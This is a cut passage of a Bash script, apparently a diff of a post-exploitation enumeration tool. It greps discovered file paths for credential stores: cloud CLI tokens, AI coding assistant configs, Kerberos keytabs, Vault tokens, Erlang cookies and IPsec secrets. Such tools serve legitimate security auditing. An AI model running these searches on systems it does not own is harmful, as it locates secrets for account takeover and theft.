"$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "credentials\.db$|legacy_credentials\.db$|adc\.json$|\.boto$|\.credentials\.json$|firebase-tools\.json$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|gcloud$|legacy_credentials$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|clouds\.config$|service_principal_entries\.json$|msal_token_cache\.json$|msal_http_cache\.bin$|service_principal_entries\.bin$|msal_token_cache\.bin$|ErrorRecords$|TokenCache\.dat$|\.bluemix$|doctl$|Google Cloud Directory Sync$|Google Password Sync$" | sort | uniq | head -n 70) + PSTORAGE_AI_CODING_ASSISTANTS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '.*/\.config/gh$|.*/AppData/.*gh$|.*/Library/Application Support/gh$|.*/(Cursor|Code|Code - Insiders)/User/(globalStorage|workspaceStorage)(/.*)?$|.*/Library/Application Support/(Cursor|Code|Code - Insiders)/User/(globalStorage|workspaceStorage)(/.*)?$' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.codex$|\.claude$|\.claude\.json$|\.gemini$|\.cursor$|\.mcp\.json$|gh$|state\.vscdb$|state\.vscdb\.backup$|storage\.json$" | sort | uniq | head -n 70) + PSTORAGE_ROAD_RECON=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.roadtools_auth$" | sort | uniq | head -n 70) + PSTORAGE_FREEIPA=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "ipa$|dirsrv$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "krb5\.conf$|.*\.keytab$|\.k5login$|krb5cc_.*$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_GRAFANA=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "grafana\.ini$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/etc/init.d/' | grep -E "^${ROOT_FOLDER}etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_SIP=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "sip\.conf$|amportal\.conf$|FreePBX\.conf$|Elastix\.conf$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_ETC\n$FIND_RUN\n$FIND_LIB64\n$FIND_OPT\n$FIND_CONCOURSE_KEYS\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SRV\n$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_TMP\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_CDROM\n$FIND_SNAP\n$FIND_SYS\n$FIND_HOMESEARCH\n$FIND_CONCOURSE_AUTH\n$FIND_USR\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_PRIVATE\n$FIND_DIR_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_SBIN\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}private|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}tmp" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e 